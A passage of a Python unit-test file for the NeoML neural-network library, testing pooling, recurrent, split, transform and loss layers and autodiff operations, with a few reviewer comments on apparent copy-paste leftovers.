        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source")
        pooling = getattr(neoml.Dnn, layer)(source, name="pooling", **init_params)
        sink = neoml.Dnn.Sink(pooling, "sink")
        layer = dnn.layers['pooling']
        self.assertEqual(layer.name, 'pooling')
        for k,v in init_params.items():
            self.assertAlmostEqual(getattr(pooling, k), v, delta=1e-3,
                msg='Initial param {} of {} differs'.format(k, layer))
            self.assertEqual(getattr(pooling, k), getattr(layer, k))
        for k,v in changed_params.items():
            setattr(pooling, k, v)
            self.assertAlmostEqual(getattr(pooling, k), v, delta=1e-3,
                msg='Changed param {} of {} differs'.format(k, layer))
            self.assertEqual(getattr(pooling, k), getattr(layer, k))
        input = neoml.Blob.asblob(math_engine, np.ones(input_shape, dtype=np.float32), input_shape)
        inputs = {"source": input}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        return out
    def test_max_pooling(self):
        """MaxPooling: 2D params may be changed after construction."""
        out = self._test_pooling('MaxPooling',
            dict(filter_size=(5, 5), stride_size=(3, 4)),
            dict(filter_size=(2, 2), stride_size=(2, 1)))
        self.assertTrue(np.equal(out, np.ones((2, 2, 4, 4, 2), dtype=np.float32)).all())
    def test_mean_pooling(self):
        """MeanPooling: same parameterization as MaxPooling."""
        out = self._test_pooling('MeanPooling',
            dict(filter_size=(5, 5), stride_size=(3, 4)),
            dict(filter_size=(2, 2), stride_size=(2, 1)))
        self.assertTrue(np.equal(out, np.ones((2, 2, 4, 4, 2), dtype=np.float32)).all())
    def test_max_pooling3d(self):
        """MaxPooling3D: 3D filter/stride round-trip."""
        out = self._test_pooling('MaxPooling3D',
            dict(filter_size=(5, 5, 5), stride_size=(3, 4, 5)),
            dict(filter_size=(2, 2, 2), stride_size=(2, 1, 1)))
        self.assertTrue(np.equal(out, np.ones((2, 2, 4, 3, 2), dtype=np.float32)).all())
    def test_mean_pooling3d(self):
        """MeanPooling3D: 3D filter/stride round-trip."""
        out = self._test_pooling('MeanPooling3D',
            dict(filter_size=(5, 5, 5), stride_size=(3, 4, 5)),
            dict(filter_size=(2, 2, 2), stride_size=(2, 1, 1)))
        self.assertTrue(np.equal(out, np.ones((2, 2, 4, 3, 2), dtype=np.float32)).all())
    def test_global_max_pooling(self):
        """GlobalMaxPooling: max_count is settable and shapes the output."""
        out = self._test_pooling('GlobalMaxPooling',
            dict(max_count=5),
            dict(max_count=6))
        self.assertTrue(np.equal(out, np.ones((2, 2, 6, 2), dtype=np.float32)).all())
    def test_global_mean_pooling(self):
        """GlobalMeanPooling: no parameters; spatial dims collapse."""
        out = self._test_pooling('GlobalMeanPooling')
        self.assertTrue(np.equal(out, np.ones((2, 2, 2), dtype=np.float32)).all())
    def test_max_over_time_pooling(self):
        """MaxOverTimePooling: filter/stride lengths along the time axis."""
        out = self._test_pooling('MaxOverTimePooling',
            dict(filter_len=3, stride_len=5),
            dict(filter_len=2, stride_len=1))
        self.assertTrue(np.equal(out, np.ones((2, 3, 5, 4, 2), dtype=np.float32)).all())
    def test_projection_pooling(self):
        """ProjectionPooling: dimension and original_size are settable."""
        out = self._test_pooling('ProjectionPooling',
            dict(dimension="width", original_size=True),
            dict(dimension="channels", original_size=False),
            input_shape=(1, 2, 3, 5, 4, 1, 2))
        self.assertTrue(np.equal(out, np.ones((2, 3, 5, 4), dtype=np.float32)).all())
    def test_object_norm(self):
        """ObjectNormalization: epsilon round-trip, scale/bias blobs, shape preserved."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        norm = neoml.Dnn.ObjectNormalization(source1, 0.01, "norm")
        sink = neoml.Dnn.Sink(norm, "sink")
        layer = dnn.layers['norm']
        self.assertEqual(layer.name, 'norm')
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 6), dtype=np.float32), (2, 3, 1, 4, 5, 1, 6))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        a = outputs["sink"]
        self.assertAlmostEqual(norm.epsilon, 0.01, delta=1e-3)
        self.assertEqual(norm.epsilon, layer.epsilon)
        norm.epsilon = 0.1
        blob = neoml.Blob.asblob(math_engine, np.ones((4, 5, 6), dtype=np.float32), (1, 1, 1, 1, 1, 1, 120))
        scale = norm.scale
        norm.scale = blob
        bias = norm.bias
        norm.bias = blob
        self.assertEqual(scale.shape, bias.shape)
        self.assertEqual(a.shape, input1.shape)
    def test_positional_embedding(self):
        """PositionalEmbedding: type round-trip and addends blob assignment."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        pos = neoml.Dnn.PositionalEmbedding(source1, "transformers", "pos")
        sink = neoml.Dnn.Sink(pos, "sink")
        layer = dnn.layers['pos']
        self.assertEqual(layer.name, 'pos')
        input1 = neoml.Blob.asblob(math_engine, np.ones((3, 4, 6), dtype=np.float32), (1, 3, 4, 1, 1, 1, 6))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        a = outputs["sink"]
        self.assertEqual(pos.type, "transformers")
        self.assertEqual(layer.type, "transformers")
        pos.type = "learnable_addition"
        blob = neoml.Blob.asblob(math_engine, np.ones((4, 5, 6), dtype=np.float32), (1, 1, 1, 1, 1, 1, 120))
        addends = pos.addends
        pos.addends = blob
        self.assertEqual(a.shape, input1.shape)
    def test_precision_recall(self):
        """PrecisionRecall: reset flag and the 4-element result vector."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        pre = neoml.Dnn.PrecisionRecall((source1, source2), False, "pre")
        sink = neoml.Dnn.Sink(pre, "sink")
        layer = dnn.layers['pre']
        self.assertEqual(layer.name, 'pre')
        self.assertEqual(pre.reset, False)
        self.assertEqual(layer.reset, False)
        pre.reset = True
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
        input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
        inputs = {"source1": input1, "source2": input2}
        outputs = dnn.run(inputs)
        a = outputs["sink"]
        # All 24 positives are classified as positive.
        self.assertEqual(pre.result, [24, 24, 0, 0])
        self.assertEqual(layer.result, [24, 24, 0, 0])
        self.assertEqual(a.size, 4)
    def test_qrnn(self):
        """Qrnn: constructor arguments are exposed as read-back properties."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        qrnn = neoml.Dnn.Qrnn((source1, source2), 'fo', 7, 4, 2, (1, 1), "sigmoid", 0.6, "direct", "qrnn")
        # NOTE(review): np.ones((21, 5, 6)) holds 630 values while the blob
        # shape (1, 21, 1, 4, 1, 1, 6) implies 504 — confirm asblob semantics.
        filter = neoml.Blob.asblob(math_engine, np.ones((21, 5, 6), dtype=np.float32), (1, 21, 1, 4, 1, 1, 6))
        qrnn.filter = filter
        free_term = neoml.Blob.asblob(math_engine, np.ones((21,), dtype=np.float32), (1, 21, 1, 1, 1, 1, 1))
        qrnn.free_term = free_term
        layer = dnn.layers['qrnn']
        self.assertEqual(layer.name, 'qrnn')
        sink = neoml.Dnn.Sink(qrnn, "sink")
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 6), dtype=np.float32), (2, 3, 1, 1, 1, 1, 6))
        input2 = neoml.Blob.asblob(math_engine, np.ones((3, 7), dtype=np.float32), (1, 3, 1, 1, 1, 1, 7))
        inputs = {"source1": input1, "source2": input2}
        outputs = dnn.run(inputs)
        a = outputs["sink"]
        self.assertEqual(qrnn.hidden_size, 7)
        self.assertEqual(layer.hidden_size, 7)
        self.assertEqual(qrnn.window_size, 4)
        self.assertEqual(qrnn.stride, 2)
        self.assertEqual(qrnn.padding_front, 1)
        self.assertEqual(layer.padding_front, 1)
        self.assertEqual(qrnn.padding_back, 1)
        self.assertEqual(qrnn.activation, "sigmoid")
        self.assertAlmostEqual(qrnn.dropout, 0.6, delta=1e-3)
        self.assertEqual(qrnn.recurrent_mode, "direct")
        self.assertEqual(a.shape, (1, 3, 1, 1, 1, 1, 7 ))
    def test_reorg(self):
        """Reorg: stride set through the dnn.layers view is visible on the wrapper."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        reorg = neoml.Dnn.Reorg(source, 3, "reorg")
        sink = neoml.Dnn.Sink(reorg, "sink")
        layer = dnn.layers['reorg']
        self.assertEqual(layer.name, 'reorg')
        layer.stride = 2
        self.assertEqual(reorg.stride, 2)
        self.assertEqual(layer.stride, 2)
        input1 = neoml.Blob.asblob(math_engine, np.ones((1, 3, 1, 8, 8, 1, 4), dtype=np.float32), (1, 3, 1, 8, 8, 1, 4))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"]
        self.assertEqual(out.shape, (1, 3, 1, 4, 4, 1, 16))
    def test_repeat_count(self):
        """RepeatSequence: repeat_count round-trip and output length."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        repeat_count = neoml.Dnn.RepeatSequence(source, 5, "layer")
        sink = neoml.Dnn.Sink(repeat_count, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        self.assertEqual(repeat_count.repeat_count, 5)
        self.assertEqual(layer.repeat_count, 5)
        # NOTE(review): RepeatSequence has no `stride` property; this looks like
        # a copy-paste leftover and has no effect (output below matches count=5).
        layer.stride = 6
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 1, 3, 2, 1, 1, 2), dtype=np.float32), (2, 1, 3, 2, 1, 1, 2))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertTrue(np.equal(out, np.ones((10, 3, 2, 2), dtype=np.float32)).all())
    def test_softmax(self):
        """Softmax: area round-trip; uniform input yields uniform probabilities."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        softmax = neoml.Dnn.Softmax(source, "list_size", "layer")
        sink = neoml.Dnn.Sink(softmax, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        self.assertEqual(softmax.area, "list_size")
        self.assertEqual(layer.area, "list_size")
        # NOTE(review): Softmax has no `stride` property; probably meant `area`.
        # Changing it to `area` would alter the expected output — leaving as-is.
        layer.stride = "channels"
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 10), dtype=np.float32), (2, 1, 10, 1, 1, 1, 1))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertTrue(np.equal(out, 0.1 * np.ones((2, 10), dtype=np.float32)).all())
    def test_split(self):
        """All seven Split* layers against numpy.split along the matching axis."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        split_types = ("SplitBatchLength", "SplitBatchWidth", "SplitListSize", "SplitHeight", "SplitWidth", "SplitDepth", "SplitChannels")
        for i, split_name in enumerate(split_types):
            split = getattr(neoml.Dnn, split_name)(source, (2, 3), split_name)
            sink = neoml.Dnn.Sink((split, 0), "sink{}".format(2 * i))
            sink = neoml.Dnn.Sink((split, 1), "sink{}".format(2 * i + 1))
        arr = np.ones((5, 5, 5, 5, 5, 5, 5), dtype=np.float32)
        input1 = neoml.Blob.asblob(math_engine, arr, (5, 5, 5, 5, 5, 5, 5))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        for i, split_name in enumerate(split_types):
            # Axis i of the 7D blob corresponds to the i-th split layer type.
            expected1, expected2, _ = np.split(arr, (2, 3), i)
            layer = dnn.layers[split_name]
            self.assertEqual(layer.name, split_name)
            out1 = outputs["sink{}".format(2 * i)].asarray()
            out2 = outputs["sink{}".format(2 * i + 1)].asarray()
            self.assertTrue(np.equal(out1, expected1).all())
            self.assertTrue(np.equal(out2, expected2).all())
    def test_sub_sequence(self):
        """SubSequence and ReverseSequence: start/length round-trip and shapes."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        subsequence = neoml.Dnn.SubSequence(source, 1, 3, "layer")
        reverse = neoml.Dnn.ReverseSequence(source, "layer2")
        sink = neoml.Dnn.Sink(subsequence, "sink")
        sink2 = neoml.Dnn.Sink(reverse, "sink2")
        layer1 = dnn.layers['layer']
        self.assertEqual(layer1.name, 'layer')
        layer2 = dnn.layers['layer2']
        self.assertEqual(layer2.name, 'layer2')
        self.assertEqual(layer1.start_pos, 1)
        subsequence.start_pos = 2
        self.assertEqual(subsequence.start_pos, 2)
        self.assertEqual(subsequence.length, 3)
        subsequence.length = 2
        self.assertEqual(layer1.length, 2)
        input1 = neoml.Blob.asblob(math_engine, np.ones((5, 3, 4), dtype=np.float32), (5, 1, 3, 1, 4, 1, 1))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out1 = outputs["sink"].asarray()
        self.assertEqual(out1.shape, (2, 3, 4))
        out2 = outputs["sink2"].asarray()
        self.assertEqual(out2.shape, (5, 3, 4))
    def test_upsampling2d(self):
        """Upsampling2D: copy counts round-trip and scale the output."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        upsampling = neoml.Dnn.Upsampling2D(source, 4, 5, "layer")
        sink = neoml.Dnn.Sink(upsampling, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        self.assertEqual(layer.height_copy_count, 4)
        layer.height_copy_count = 2
        self.assertEqual(upsampling.height_copy_count, 2)
        self.assertEqual(upsampling.width_copy_count, 5)
        upsampling.width_copy_count = 3
        self.assertEqual(layer.width_copy_count, 3)
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 2), dtype=np.float32), (1, 2, 3, 1, 2, 1, 1))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertTrue(np.equal(out, np.ones((2, 3, 2, 6), dtype=np.float32)).all())
    def test_transform(self):
        """Transform: a list of (operation, value) rules reshapes the blob."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        trans = [("set", 3), ("set", 1), ("set", 5), ("set", 4), ("divide", 4), ("multiply", 2), ("remainder", 4)]
        transform = neoml.Dnn.Transform(source, trans, "layer")
        sink = neoml.Dnn.Sink(transform, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        self.assertEqual(transform.transforms, trans)
        self.assertEqual(layer.transforms, trans)
        layer.transforms = trans
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 2, 3, 1, 4, 1, 5))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertEqual(out.shape, (3, 5, 4, 2))
    def test_transpose(self):
        """Transpose: dimension names round-trip via the dnn.layers view."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        transpose = neoml.Dnn.Transpose(source, "height", "width", "layer")
        sink = neoml.Dnn.Sink(transpose, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        self.assertEqual(transpose.first_dim, "height")
        layer.first_dim = "depth"
        self.assertEqual(layer.first_dim, "depth")
        self.assertEqual(transpose.second_dim, "width")
        layer.second_dim = "channels"
        self.assertEqual(layer.second_dim, "channels")
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 2, 1, 2, 1, 5, 5))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertTrue(np.equal(out, np.ones((2, 2, 5, 5), dtype=np.float32)).all())
    def test_sequence_sum(self):
        """SequenceSum: sums an all-ones length-5 sequence to fives."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source = neoml.Dnn.Source(dnn, "source1")
        sequence_sum = neoml.Dnn.SequenceSum(source, "layer")
        sink = neoml.Dnn.Sink(sequence_sum, "sink")
        layer = dnn.layers['layer']
        self.assertEqual(layer.name, 'layer')
        input1 = neoml.Blob.asblob(math_engine, np.ones((5, 2, 2), dtype=np.float32), (5, 1, 1, 2, 1, 1, 2))
        inputs = {"source1": input1}
        outputs = dnn.run(inputs)
        out = outputs["sink"].asarray()
        self.assertTrue(np.equal(out, [[5., 5.], [5., 5.]]).all())
    def test_irnn(self):
        """Irnn: hidden_size/identity_scale/input_weight_std round-trip and shape."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        batch_length = 12
        batch_width = 6
        channels_in = 5
        hidden_size = 10
        identity_scale = 1e-1
        input_weight_std = 1e-4
        name = "irnn_test_name"
        source = neoml.Dnn.Source(dnn, "source")
        irnn = neoml.Dnn.Irnn(source, hidden_size, identity_scale, input_weight_std, True, name)
        sink = neoml.Dnn.Sink(irnn, "sink")
        layer = dnn.layers[name]
        self.assertEqual(layer.name, name)
        input1 = neoml.Blob.asblob(math_engine, np.ones((batch_length, batch_width, channels_in), dtype=np.float32),
                                   (batch_length, batch_width, 1, 1, 1, 1, channels_in))
        inputs = {"source": input1}
        outputs = dnn.run(inputs)
        a = outputs["sink"]
        self.assertEqual(irnn.hidden_size, hidden_size)
        self.assertEqual(layer.hidden_size, hidden_size)
        self.assertAlmostEqual(irnn.identity_scale, identity_scale, delta=1e-5)
        self.assertAlmostEqual(irnn.input_weight_std, input_weight_std, delta=1e-5)
        self.assertEqual(a.shape, (batch_length, batch_width, 1, 1, 1, 1, hidden_size))
    def test_indrnn(self):
        """IndRnn: constructor arguments round-trip through properties."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        batch_length = 12
        batch_width = 6
        channels_in = 5
        hidden_size = 10
        dropout_rate = 0.5
        reverse = True
        activation = 'sigmoid'
        name = "indrnn_test_name"
        source = neoml.Dnn.Source(dnn, "source")
        indrnn = neoml.Dnn.IndRnn(source, hidden_size, dropout_rate, reverse, activation, name)
        sink = neoml.Dnn.Sink(indrnn, "sink")
        layer = dnn.layers[name]
        self.assertEqual(layer.name, name)
        input1 = neoml.Blob.asblob(math_engine, np.ones((batch_length, batch_width, channels_in), dtype=np.float32),
                                   (batch_length, batch_width, 1, 1, 1, 1, channels_in))
        inputs = { "source" : input1 }
        outputs = dnn.run(inputs)
        a = outputs[sink.name]
        self.assertEqual(indrnn.hidden_size, hidden_size)
        self.assertEqual(layer.hidden_size, hidden_size)
        self.assertAlmostEqual(indrnn.dropout_rate, dropout_rate, delta=1e-5)
        self.assertEqual(indrnn.reverse_sequence, reverse)
        self.assertEqual(indrnn.activation, activation)
class MulLossCalculator(neoml.Dnn.CustomLossCalculatorBase):
    """Custom loss calculator: elementwise squared difference (data - labels)^2."""
    def calc(self, data, labels):
        # Squared error built from autodiff ops so gradients can flow through.
        return neoml.AutoDiff.mul(data - labels, data - labels)
class BinaryCrossEntropyLossCalculator(neoml.Dnn.CustomLossCalculatorBase):
    """Custom loss calculator delegating to autodiff binary cross-entropy."""
    def calc(self, data, labels):
        # NOTE(review): the boolean flag presumably selects the from-logits
        # variant — confirm against the neoml.AutoDiff documentation.
        return neoml.AutoDiff.binary_cross_entropy(data, labels, True)
class LossTestCase(MultithreadedTestCase):
    """Tests for the loss layers, custom Python losses and autodiff helpers."""
    def _test_loss(self, layer, kwargs=None,
                   n_classes=2,
                   labels_type=np.float32,
                   last_loss=0.):
        """Build loss layer `layer` with `kwargs` on three all-ones inputs
        (data, labels, weights), run the net, then verify each kwarg
        round-trips and last_loss equals `last_loss`.
        """
        # None sentinel instead of a mutable default argument.
        kwargs = {} if kwargs is None else kwargs
        shape = (2, 3, 1, 1, 1, 1, 1 if n_classes == 2 else n_classes)
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        source3 = neoml.Dnn.Source(dnn, "source3")
        loss = getattr(neoml.Dnn, layer)((source1, source2, source3), name="loss", **kwargs)
        layer = dnn.layers['loss']
        self.assertEqual(layer.name, 'loss')
        input1 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
        input2 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=labels_type), shape)
        input3 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
        inputs = {"source1": input1, "source2": input2, "source3": input3}
        dnn.run(inputs)
        for k,v in kwargs.items():
            self.assertAlmostEqual(getattr(loss, k), v, delta=1e-3,
                msg='Field {} of {} differs'.format(k, layer))
            self.assertEqual(getattr(loss, k), getattr(layer, k))
        self.assertAlmostEqual(loss.last_loss, last_loss, delta=1e-3)
        self.assertAlmostEqual(layer.last_loss, last_loss, delta=1e-3)
    def _test_custom_loss(self, loss_calculator, result_loss):
        """Checkpoint a net holding a CustomLoss built from `loss_calculator`,
        reload it, run it, and check the reloaded layer's last_loss.
        """
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        shape = (2, 3, 1, 1, 1, 1, 1)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        source3 = neoml.Dnn.Source(dnn, "source3")
        loss = neoml.Dnn.CustomLoss((source1, source2, source3), name="loss", loss_weight=7.7,
                                    loss_calculator=loss_calculator)
        input1 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
        input2 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
        input3 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
        inputs = {"source1": input1, "source2": input2, "source3": input3}
        # `dir` shadowed the builtin; renamed the local.
        tmp_dir = tempfile.mkdtemp()
        path = os.path.join(tmp_dir, 'custom_loss_dnn.arc')
        dnn.store_checkpoint(path)
        dnn_loaded = neoml.Dnn.Dnn(math_engine)
        dnn_loaded.load_checkpoint(path)
        os.remove(path)
        os.rmdir(tmp_dir)
        dnn_loaded.run(inputs)
        layer = dnn_loaded.layers['loss']
        self.assertEqual(layer.name, 'loss')
        self.assertAlmostEqual(layer.last_loss, result_loss, delta=1e-3)
    def test_custom_loss(self):
        """Both sample custom loss calculators survive checkpoint round-trips."""
        # Removed an unused `import neoml.AutoDiff as ad`.
        for loss_calculator, result_loss in [
            (BinaryCrossEntropyLossCalculator(), 0.313261),
            (MulLossCalculator(), 0),
        ]:
            self._test_custom_loss(loss_calculator, result_loss)
    def test_autodiff_functions(self):
        """Smoke-check every neoml.AutoDiff helper and operator overload on
        constant blobs of known values."""
        import neoml.AutoDiff as ad
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        shape = (2, 3, 1, 1, 1, 2, 3)
        const0 = ad.const(math_engine, shape, 0)
        const2 = ad.const(math_engine, shape, 2)
        ones = np.ones(shape, dtype=np.float32)
        const_ones = ad.const(math_engine, shape, ones)
        blob = neoml.Blob.asblob(math_engine, ones, shape)
        self.assertTrue( np.equal( ad.add(const2, blob).asarray(), 3 * ones ).all() )
        self.assertTrue( np.equal( ad.add(2, blob).asarray(), 3 * ones ).all() )
        self.assertTrue( np.equal( (const2 + 3).asarray(), 5 * ones ).all() )
        self.assertTrue( np.equal( ad.sub(const2, blob).asarray(), ones ).all() )
        self.assertTrue( np.equal( ad.sub(const2, 0).asarray(), 2 * ones ).all() )
        self.assertTrue( np.equal( (3 - blob).asarray(), 2 * ones ).all() )
        self.assertTrue( np.equal( ad.mul(const2, 2).asarray(), 4 * ones ).all() )
        self.assertTrue( np.equal( ad.mul(2, blob).asarray(), 2 * ones ).all() )
        self.assertTrue( np.equal( (const0 * const2).asarray(), 0 * ones ).all() )
        self.assertTrue( np.equal( ad.div(2, const2).asarray(), ones ).all() )
        self.assertTrue( np.equal( ad.div(const2, 2).asarray(), ones ).all() )
        self.assertTrue( np.equal( (const2 / const_ones).asarray(), 2 * ones ).all() )
        self.assertTrue( np.equal( ad.max(const_ones, 2).asarray(), 2 * ones ).all() )
        self.assertEqual( ad.sum(blob).asarray(), 36 )
        self.assertEqual( ad.mean(blob).asarray(), 1 )
        self.assertTrue( np.equal( ad.neg(blob).asarray(), -ones ).all() )
        self.assertTrue( np.equal( (-blob).asarray(), -ones ).all() )
        self.assertTrue( np.equal( ad.abs(-blob).asarray(), ones ).all() )
        self.assertTrue( np.equal( ad.log(const_ones).asarray(), 0 * ones ).all() )
        self.assertTrue( np.equal( ad.exp(const0).asarray(), ones ).all() )
        self.assertTrue( np.equal( ad.clip(const2, 3, 4).asarray(), 3 * ones ).all() )
        self.assertTrue( np.equal( ad.top_k(const2, 3).asarray(), [2, 2, 2] ).all() )
        self.assertTrue( np.equal( ad.binary_cross_entropy(const0, const0, False).asarray(), 0 * ones ).all() )
        self.assertTrue( np.equal( ad.sum(blob, [1]).asarray(), 3 * np.ones((2, 1, 1, 1, 1, 2, 3)) ).all() )
        self.assertTrue( np.equal( ad.mean(blob, 1).asarray(), np.ones((2, 1, 1, 1, 1, 2, 3)) ).all() )
        self.assertTrue( np.equal( ad.sum(blob, [0, 1]).asarray(), 6 * np.ones((1, 1, 1, 1, 1, 2, 3)) ).all() )
        self.assertTrue( np.equal( ad.mean(blob, [1, 5]).asarray(), np.ones((2, 1, 1, 1, 1, 1, 3)) ).all() )
        self.assertTrue( np.equal( ad.cumsum(blob, 1).asarray().reshape(shape), np.cumsum(ones, 1) ).all() )
        self.assertTrue( np.equal( ad.concat([blob, blob, blob], axis=2).asarray(), np.ones((2, 3, 3, 2, 3)) ).all() )
        self.assertTrue( np.equal((blob < 2 * blob).asarray(), ones).all() )
        self.assertTrue( np.equal((blob < 2).asarray(), ones).all() )
        self.assertTrue( np.equal((0 < blob).asarray(), ones).all() )
        self.assertTrue( np.equal(ad.less(blob, 0).asarray(), 0 * ones).all() )
        self.assertTrue( np.equal(ad.pow(2 * blob, 3 * blob).asarray(), 8 * ones).all() )
        self.assertTrue( np.equal((2**blob).asarray(), 2 * ones).all() )
        self.assertTrue( np.equal((blob**2).asarray(), ones).all() )
        # reshape mutates the blob in place.
        new_shape = (3, 3, 1, 1, 2, 2, 1)
        ad.reshape(blob, new_shape)
        self.assertTrue( np.equal(blob.shape, new_shape).all() )
        broadcasted = ad.broadcast(blob, (3, 3, 2, 1, 2, 2, 2))
        self.assertTrue( np.equal(broadcasted.asarray(), np.ones((3, 3, 2, 2, 2, 2))).all() )
    def test_cross_entropy_loss(self):
        """CrossEntropyLoss with softmax, integer labels and per-object weights."""
        math_engine = neoml.MathEngine.CpuMathEngine(1)
        dnn = neoml.Dnn.Dnn(math_engine)
        source1 = neoml.Dnn.Source(dnn, "source1")
        source2 = neoml.Dnn.Source(dnn, "source2")
        source3 = neoml.Dnn.Source(dnn, "source3")
        loss = neoml.Dnn.CrossEntropyLoss((source1, source2, source3), True, 7.7, "loss")
        layer = dnn.layers['loss']
        self.assertEqual(layer.name, 'loss')
        input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 2), dtype=np.float32), (2, 3, 4, 1, 1, 1, 2))
        input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.int32), (2, 3, 4, 1, 1, 1, 1))
        input3 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
        inputs = {"source1": input1, "source2": input2, "source3": input3}
        dnn.run(inputs)
        self.assertEqual(loss.apply_softmax, True)
        self.assertAlmostEqual(loss.loss_weight, 7.7, delta=1e-3)
        # Uniform two-class logits give loss ln(2) ~= 0.6931.
        self.assertAlmostEqual(loss.last_loss, 0.6931, delta=1e-3)
        self.assertEqual(loss.loss_weight, layer.loss_weight)
        self.assertEqual(loss.last_loss, layer.last_loss)
    def test_binary_cross_entropy_loss(self):
        """BinaryCrossEntropyLoss with a positive-class weight."""
        self._test_loss('BinaryCrossEntropyLoss',
            dict(positive_weight=6.6, loss_weight=7.7),
            last_loss=2.0675)
    def test_euclidean_loss(self):
        """EuclideanLoss: identical data/labels give zero loss."""
        self._test_loss('EuclideanLoss', dict(loss_weight=7.7), last_loss=0.)
    def test_hinge_loss(self):
        """HingeLoss: correct confident prediction gives zero loss."""
        self._test_loss('HingeLoss', dict(loss_weight=7.7), last_loss=0.)
    def test_squared_hinge_loss(self):
        """SquaredHingeLoss: correct confident prediction gives zero loss."""
        self._test_loss('SquaredHingeLoss', dict(loss_weight=7.7), last_loss=0.)
    def test_focal_loss(self):
        """FocalLoss over 5 classes."""
        self._test_loss('FocalLoss',
            dict(force=6.6, loss_weight=7.7),
            n_classes=5,
            last_loss=0.)
    def test_binary_focal_loss(self):
        """BinaryFocalLoss with a force parameter."""
